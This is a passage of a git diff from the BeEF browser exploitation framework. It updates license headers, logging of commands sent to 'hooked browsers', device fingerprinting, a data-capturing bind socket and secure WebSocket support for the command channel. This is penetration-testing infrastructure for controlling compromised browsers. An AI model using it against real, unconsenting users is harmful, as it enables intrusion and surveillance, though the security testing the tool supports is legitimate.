find_beefjs_component_path(component) - component_path = component - component_path.gsub!(/beef./, '') - component_path.gsub!(/\./, '/') - component_path.replace "#{$root_dir}/core/main/client/#{component_path}.js" - - return false if not File.exists? component_path - - component_path - end - - # Builds missing beefjs components. - # @param [Array] beefjs_components An array of component names - def build_missing_beefjs_components(beefjs_components) - # @note verifies that @beef_js_cmps is not nil to avoid bugs - @beef_js_cmps = '' if @beef_js_cmps.nil? - - if beefjs_components.is_a? String - beefjs_components_path = find_beefjs_component_path(beefjs_components) - raise "Invalid component: could not build the beefjs file" if not beefjs_components_path - beefjs_components = {beefjs_components => beefjs_components_path} - end - - beefjs_components.keys.each {|k| - next if @beef_js_cmps.include? beefjs_components[k] - - # @note path to the component - component_path = beefjs_components[k] - - # @note we output the component to the hooked browser - @body << File.read(component_path)+"\n\n" - - # @note finally we add the component to the list of components already generated so it does not get generated numerous times. - if @beef_js_cmps.eql? '' - @beef_js_cmps = component_path - else - @beef_js_cmps += ",#{component_path}" - end - } - end - end - -end -end -end end diff --git a/core/main/handlers/modules/command.rb b/core/main/handlers/modules/command.rb index 9d7646614..0df1cbdc9 100644 --- a/core/main/handlers/modules/command.rb +++ b/core/main/handlers/modules/command.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Core @@ -61,19 +51,11 @@ module BeEF #todo antisnatchor: remove this gsub crap adding some hook packing. if config.get("beef.http.websocket.enable") && ws.getsocket(hooked_browser.session) #content = command_module.output.gsub('// - #// Copyright 2012 Wade Alcorn wade@bindshell.net #// - #// Licensed under the Apache License, Version 2.0 (the "License"); - #// you may not use this file except in compliance with the License. - #// You may obtain a copy of the License at + #// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net + #// Browser Exploitation Framework (BeEF) - http://beefproject.com + #// See the file 'doc/COPYING' for copying permission #// - #// http://www.apache.org/licenses/LICENSE-2.0 - #// - #// Unless required by applicable law or agreed to in writing, software - #// distributed under the License is distributed on an "AS IS" BASIS, - #// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - #// See the License for the specific language governing permissions and - #// limitations under the License. #//', "") ws.send(@output, hooked_browser.session) else @@ -82,7 +64,7 @@ module BeEF # @note prints the event to the console if BeEF::Settings.console? name = command_module.friendlyname || kclass - print_info "Hooked browser #{hooked_browser.ip} has been sent instructions from command module '#{name}'" + print_info "Hooked browser [id:#{hooked_browser.id}, ip:#{hooked_browser.ip}] has been sent instructions from command module [id:#{command.id}, name:'#{name}']" end # @note flag that the command has been sent to the hooked browser diff --git a/core/main/logger.rb b/core/main/logger.rb index f9e128d77..5486be58c 100644 --- a/core/main/logger.rb +++ b/core/main/logger.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF @@ -24,6 +14,10 @@ module Core # Constructor def initialize @logs = BeEF::Core::Models::Log + @config = BeEF::Core::Configuration.instance + + # if notifications are enabled create a new instance + @notifications = BeEF::Extension::Notifications::Notifications unless @config.get('beef.extension.notifications.enable') == false end # Registers a new event in the logs @@ -34,6 +28,9 @@ module Core def register(from, event, hb = 0) # type conversion to enforce standards hb = hb.to_i + + # get time now + time_now = Time.now # arguments type checking raise Exception::TypeError, '"from" needs to be a string' if not from.string? @@ -41,7 +38,12 @@ module Core raise Exception::TypeError, '"Hooked Browser ID" needs to be an integer' if not hb.integer? # logging the new event into the database - @logs.new(:type => "#{from}", :event => "#{event}", :date => Time.now, :hooked_browser_id => hb).save + @logs.new(:type => "#{from}", :event => "#{event}", :date => time_now, :hooked_browser_id => hb).save + + # if notifications are enabled send the info there too + if @notifications + @notifications.new(from, event, time_now, hb) + end # return true diff --git a/core/main/migration.rb b/core/main/migration.rb index e9b553fc4..973ea0229 100644 --- a/core/main/migration.rb +++ b/core/main/migration.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF diff --git a/core/main/models/browserdetails.rb b/core/main/models/browserdetails.rb index 0cd114c75..020da0e06 100644 --- a/core/main/models/browserdetails.rb +++ b/core/main/models/browserdetails.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Core @@ -62,7 +52,7 @@ module Models browserdetails end - + # # Returns the icon representing the browser type the # hooked browser is using (i.e. Firefox, Internet Explorer) @@ -94,9 +84,10 @@ module Models return BeEF::Core::Constants::Os::OS_QNX_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_QNX_UA_STR return BeEF::Core::Constants::Os::OS_BEOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_BEOS_UA_STR return BeEF::Core::Constants::Os::OS_OPENBSD_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_OPENBSD_UA_STR - return BeEF::Core::Constants::Os::OS_IPHONE_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPHONE_UA_STR - return BeEF::Core::Constants::Os::OS_IPAD_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPAD_UA_STR - return BeEF::Core::Constants::Os::OS_IPOD_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPOD_UA_STR + return BeEF::Core::Constants::Os::OS_WEBOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_WEBOS_UA_STR + return BeEF::Core::Constants::Os::OS_IOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPHONE_UA_STR + return BeEF::Core::Constants::Os::OS_IOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPAD_UA_STR + return BeEF::Core::Constants::Os::OS_IOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPOD_UA_STR return BeEF::Core::Constants::Os::OS_MAEMO_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_MAEMO_UA_STR return BeEF::Core::Constants::Os::OS_MAC_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_MAC_UA_STR return BeEF::Core::Constants::Os::OS_BLACKBERRY_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_BLACKBERRY_UA_STR @@ -105,6 +96,33 @@ module Models BeEF::Core::Constants::Os::OS_UNKNOWN_IMG end + # + # Returns the icon representing the hardware the + # zombie is running on (i.e. iPhone, BlackBerry) + # + def self.hw_icon(session_id) + + ua_string = get(session_id, 'BrowserReportedName') + + return BeEF::Core::Constants::Hardware::HW_UNKNOWN_IMG if ua_string.nil? + + return BeEF::Core::Constants::Hardware::HW_WINPHONE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_WINPHONE_UA_STR + return BeEF::Core::Constants::Hardware::HW_ZUNE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_ZUNE_UA_STR + return BeEF::Core::Constants::Hardware::HW_BLACKBERRY_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_BLACKBERRY_UA_STR + return BeEF::Core::Constants::Hardware::HW_IPHONE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_IPHONE_UA_STR + return BeEF::Core::Constants::Hardware::HW_IPAD_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_IPAD_UA_STR + return BeEF::Core::Constants::Hardware::HW_IPOD_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_IPOD_UA_STR + return BeEF::Core::Constants::Hardware::HW_KINDLE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_KINDLE_UA_STR + return BeEF::Core::Constants::Hardware::HW_NOKIA_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_NOKIA_UA_STR + return BeEF::Core::Constants::Hardware::HW_MOTOROLA_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_MOTOROLA_UA_STR + return BeEF::Core::Constants::Hardware::HW_HTC_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_HTC_UA_STR + return BeEF::Core::Constants::Hardware::HW_GOOGLE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_GOOGLE_UA_STR + return BeEF::Core::Constants::Hardware::HW_ERICSSON_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_ERICSSON_UA_STR + + BeEF::Core::Constants::Hardware::HW_UNKNOWN_IMG + + end + end end diff --git a/core/main/models/command.rb b/core/main/models/command.rb index c4f8751e4..bc408b22f 100644 --- a/core/main/models/command.rb +++ b/core/main/models/command.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF @@ -65,11 +55,11 @@ module Models command.save # @note log that the result was returned - BeEF::Core::Logger.instance.register('Command', "Hooked browser #{hooked_browser.ip} has executed instructions from command module '#{command_friendly_name}'", hooked_browser_id) + BeEF::Core::Logger.instance.register('Command', "Hooked browser [id:#{hooked_browser.id}, ip:#{hooked_browser.ip}] has executed instructions from command module [id:#{command_id}, name:'#{command_friendly_name}']", hooked_browser_id) # @note prints the event into the console if BeEF::Settings.console? - print_info "Hooked browser #{hooked_browser.ip} has executed instructions from command module '#{command_friendly_name}'" + print_info "Hooked browser [id:#{hooked_browser.id}, ip:#{hooked_browser.ip}] has executed instructions from command module [id:#{command_id}, name:'#{command_friendly_name}']" end end diff --git a/core/main/models/commandmodule.rb b/core/main/models/commandmodule.rb index 9ade6f12e..11100aaa4 100644 --- a/core/main/models/commandmodule.rb +++ b/core/main/models/commandmodule.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Core diff --git a/core/main/models/hookedbrowser.rb b/core/main/models/hookedbrowser.rb index 0f48f00a8..13c011e04 100644 --- a/core/main/models/hookedbrowser.rb +++ b/core/main/models/hookedbrowser.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Core diff --git a/core/main/models/log.rb b/core/main/models/log.rb index 9089c0c07..3e78c0c7f 100644 --- a/core/main/models/log.rb +++ b/core/main/models/log.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Core diff --git a/core/main/models/optioncache.rb b/core/main/models/optioncache.rb index 74851f908..9dedec1d1 100644 --- a/core/main/models/optioncache.rb +++ b/core/main/models/optioncache.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Core diff --git a/core/main/models/result.rb b/core/main/models/result.rb index 481069b86..50e20ed1b 100644 --- a/core/main/models/result.rb +++ b/core/main/models/result.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Core diff --git a/core/main/models/user.rb b/core/main/models/user.rb index 34d98151e..6b5947bad 100644 --- a/core/main/models/user.rb +++ b/core/main/models/user.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Core diff --git a/core/main/network_stack/api.rb b/core/main/network_stack/api.rb index 731853f64..1e7c5bae2 100644 --- a/core/main/network_stack/api.rb +++ b/core/main/network_stack/api.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Core diff --git a/core/main/network_stack/assethandler.rb b/core/main/network_stack/assethandler.rb index 682fb5b14..c17c0689c 100644 --- a/core/main/network_stack/assethandler.rb +++ b/core/main/network_stack/assethandler.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Core @@ -29,6 +19,7 @@ module Handlers # Starts the AssetHandler instance def initialize @allocations = {} + @sockets = {} @http_server = BeEF::Core::Server.instance @root_dir = File.expand_path('../../../../', __FILE__) end @@ -59,6 +50,60 @@ module Handlers print_info "Url [" + url + "] unmounted" end + # use it like: bind_socket("irc","0.0.0.0",6667) + def bind_socket(name, host, port) + if @sockets[name] != nil + print_error "Bind Socket [#{name}] is already listening on [#{host}:#{port}]." + else + t = Thread.new { + server = TCPServer.new(host,port) + loop do + Thread.start(server.accept) do |client| + data = "" + recv_length = 1024 + threshold = 1024 * 512 + while (tmp = client.recv(recv_length)) + data += tmp + break if tmp.length < recv_length || tmp.length == recv_length + # 512 KB max of incoming data + break if data > threshold + end + if data.size > threshold + print_error "More than 512 KB of data incoming for Bind Socket [#{name}]. For security purposes client connection is closed, and data not saved." + else + @sockets[name] = {'thread' => t, 'data' => data} + print_info "Bind Socket [#{name}] received [#{data.size}] bytes of data." + print_debug "Bind Socket [#{name}] received:\n#{data}" + end + client.close + end + end + } + print_info "Bind socket [#{name}] listening on [#{host}:#{port}]." + end + end + + def get_socket_data(name) + data = nil + if @sockets[name] != nil + data = @sockets[name]['data'] + else + print_error "Bind Socket [#{name}] does not exists." + end + data + end + + def unbind_socket(name) + t = @sockets[name]['thread'] + if t.alive? + print_debug "Thread to be killed: #{t}" + Thread.kill(t) + print_info "Bind Socket [#{name}] killed." + else + print_info "Bind Socket [#{name}] ALREADY killed." + end + end + # Builds a URL based on the path and extension, if neither are passed a random URL will be generated # @param [String] path URL Path defined by bind() # @param [String] extension Extension defined by bind() diff --git a/core/main/network_stack/handlers/dynamicreconstruction.rb b/core/main/network_stack/handlers/dynamicreconstruction.rb index f2a32fb5e..276b63780 100644 --- a/core/main/network_stack/handlers/dynamicreconstruction.rb +++ b/core/main/network_stack/handlers/dynamicreconstruction.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Core diff --git a/core/main/network_stack/websocket/websocket.rb b/core/main/network_stack/websocket/websocket.rb index a24506827..a9274f5b5 100644 --- a/core/main/network_stack/websocket/websocket.rb +++ b/core/main/network_stack/websocket/websocket.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Core @@ -27,17 +17,156 @@ module BeEF @@activeSocket= Hash.new @@lastalive= Hash.new @@config = BeEF::Core::Configuration.instance + #@@wsopt=nil MOUNTS = BeEF::Core::Server.instance.mounts def initialize - port = @@config.get("beef.http.websocket.port") + + secure = @@config.get("beef.http.websocket.secure") + @root_dir = File.expand_path('../../../../../', __FILE__) + + if (secure) + ws_secure_options = {:host => "0.0.0.0", :port => @@config.get("beef.http.websocket.secure_port"), :secure => true, + :tls_options => { + :private_key_file => @root_dir+"/"+@@config.get("beef.http.https.key"), + :cert_chain_file => @root_dir+"/"+ @@config.get("beef.http.https.cert") + } + } + # @note Start a WSS server socket + start_websocket_server(ws_secure_options, true) + end + + # @note Start a WS server socket + ws_options = {:host => "0.0.0.0", :port => @@config.get("beef.http.websocket.port")} + start_websocket_server(ws_options,false) + + # #Thread for websocket-secure + # Thread.new { + # port = @@config.get("beef.http.websocket.secure_port") + # sleep 2 # prevent issues when starting at the same time the TunnelingProxy, Thin and Evented WebSockets + # EventMachine.run { + # + # wsopt = {:host => "0.0.0.0", :port => port, :secure => true, + # :tls_options => { + # :private_key_file => @root_dir+"/"+@@config.get("beef.http.https.key"), + # :cert_chain_file => @root_dir+"/"+ @@config.get("beef.http.https.cert") + # } + # } + # + # + # EventMachine::WebSocket.start(wsopt) do |ws| + # begin + # print_debug "New WebSocket-secured channel open." + # ws.onmessage { |msg| + # msg_hash = JSON.parse("#{msg}") + # #@note messageHash[result] is Base64 encoded + # if (msg_hash["cookie"]!= nil) + # print_debug("WebSocket-secured - Browser says helo! WebSocket is running") + # #insert new connection in activesocket + # @@activeSocket["#{msg_hash["cookie"]}"] = ws + # print_debug("WebSocket-secured - activeSocket content [#{@@activeSocket}]") + # elsif msg_hash["alive"] != nil + # hooked_browser = BeEF::Core::Models::HookedBrowser.first(:session => msg_hash["alive"]) + # unless hooked_browser.nil? + # hooked_browser.lastseen = Time.new.to_i + # hooked_browser.count! + # hooked_browser.save + # + # #Check if new modules need to be sent + # zombie_commands = BeEF::Core::Models::Command.all(:hooked_browser_id => hooked_browser.id, :instructions_sent => false) + # zombie_commands.each { |command| add_command_instructions(command, hooked_browser) } + # + # #@todo antisnatchor: + # #@todo - re-use the pre_hook_send callback mechanisms to have a generic check for multipl extensions + # #Check if new forged requests need to be sent (Requester/TunnelingProxy) + # dhook = BeEF::Extension::Requester::API::Hook.new + # dhook.requester_run(hooked_browser, '') + # + # #Check if new XssRays scan need to be started + # xssrays = BeEF::Extension::Xssrays::API::Scan.new + # xssrays.start_scan(hooked_browser, '') + # end + # else + # #json recv is a cmd response decode and send all to + # #we have to call dynamicreconstructor handler camp must be websocket + # #print_debug("Received from WebSocket #{messageHash}") + # execute(msg_hash) + # end + # } + # rescue Exception => e + # print_error "WebSocket-secured error: #{e}" + # end + # end + # } + # + # } + # + ##Thread for websocket + #Thread.new { + # port = @@config.get("beef.http.websocket.port") + # sleep 2 # prevent issues when starting at the same time the TunnelingProxy, Thin and Evented WebSockets + # EventMachine.run { + # + # wsopt = {:host => "0.0.0.0", :port => port} + # + # + # EventMachine::WebSocket.start(wsopt) do |ws| + # begin + # print_debug "New WebSocket channel open." + # ws.onmessage { |msg| + # msg_hash = JSON.parse("#{msg}") + # #@note messageHash[result] is Base64 encoded + # if (msg_hash["cookie"]!= nil) + # print_debug("WebSocket - Browser says helo! WebSocket is running") + # #insert new connection in activesocket + # @@activeSocket["#{msg_hash["cookie"]}"] = ws + # print_debug("WebSocket - activeSocket content [#{@@activeSocket}]") + # elsif msg_hash["alive"] != nil + # hooked_browser = BeEF::Core::Models::HookedBrowser.first(:session => msg_hash["alive"]) + # unless hooked_browser.nil? + # hooked_browser.lastseen = Time.new.to_i + # hooked_browser.count! + # hooked_browser.save + # + # #Check if new modules need to be sent + # zombie_commands = BeEF::Core::Models::Command.all(:hooked_browser_id => hooked_browser.id, :instructions_sent => false) + # zombie_commands.each { |command| add_command_instructions(command, hooked_browser) } + # + # #@todo antisnatchor: + # #@todo - re-use the pre_hook_send callback mechanisms to have a generic check for multipl extensions + # #Check if new forged requests need to be sent (Requester/TunnelingProxy) + # dhook = BeEF::Extension::Requester::API::Hook.new + # dhook.requester_run(hooked_browser, '') + # + # #Check if new XssRays scan need to be started + # xssrays = BeEF::Extension::Xssrays::API::Scan.new + # xssrays.start_scan(hooked_browser, '') + # end + # else + # #json recv is a cmd response decode and send all to + # #we have to call dynamicreconstructor handler camp must be websocket + # #print_debug("Received from WebSocket #{messageHash}") + # execute(msg_hash) + # end + # } + # rescue Exception => e + # print_error "WebSocket error: #{e}" + # end + # end + # } + #} + + + end + + def start_websocket_server(ws_options, secure) Thread.new { sleep 2 # prevent issues when starting at the same time the TunnelingProxy, Thin and Evented WebSockets - EventMachine.run { #todo antisnatchor: add support for WebSocket secure (new object with different config options, then start) - EventMachine::WebSocket.start(:host => "0.0.0.0", :port => port) do |ws| + EventMachine.run { + EventMachine::WebSocket.start(ws_options) do |ws| begin - print_debug "New WebSocket channel open." + secure ? print_debug("New WebSocketSecure channel open.") : print_debug("New WebSocket channel open.") ws.onmessage { |msg| msg_hash = JSON.parse("#{msg}") #@note messageHash[result] is Base64 encoded @@ -80,7 +209,6 @@ module BeEF end } } - end #@note retrieve the right websocket channel given an hooked browser session @@ -115,7 +243,7 @@ module BeEF handler = data["handler"] if handler.match(/command/) BeEF::Core::Models::Command.save_result(hooked_browser, data["cid"], - @@config.get("beef.module.#{handler.gsub("/command/", "").gsub(".js", "")}.name"), command_results) + @@config.get("beef.module.#{handler.gsub("/command/", "").gsub(".js", "")}.name"), command_results) else #processing results from extensions, call the right handler data["beefhook"] = hooked_browser data["results"] = JSON.parse(Base64.decode64(data["result"])) diff --git a/core/main/rest/api.rb b/core/main/rest/api.rb index 0f8ce0b7c..9171b2c76 100644 --- a/core/main/rest/api.rb +++ b/core/main/rest/api.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Core @@ -29,6 +19,12 @@ module BeEF end end + module RegisterCategoriesHandler + def self.mount_handler(server) + server.mount('/api/categories', BeEF::Core::Rest::Categories.new) + end + end + module RegisterLogsHandler def self.mount_handler(server) server.mount('/api/logs', BeEF::Core::Rest::Logs.new) @@ -43,6 +39,8 @@ module BeEF BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterHooksHandler, BeEF::API::Server, 'mount_handler') BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterModulesHandler, BeEF::API::Server, 'mount_handler') + BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterCategoriesHandler, BeEF::API::Server, 'mount_handler') + BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterLogsHandler, BeEF::API::Server, 'mount_handler') BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterAdminHandler, BeEF::API::Server, 'mount_handler') diff --git a/core/main/rest/handlers/admin.rb b/core/main/rest/handlers/admin.rb index d36935bfe..6730f2d9e 100644 --- a/core/main/rest/handlers/admin.rb +++ b/core/main/rest/handlers/admin.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance 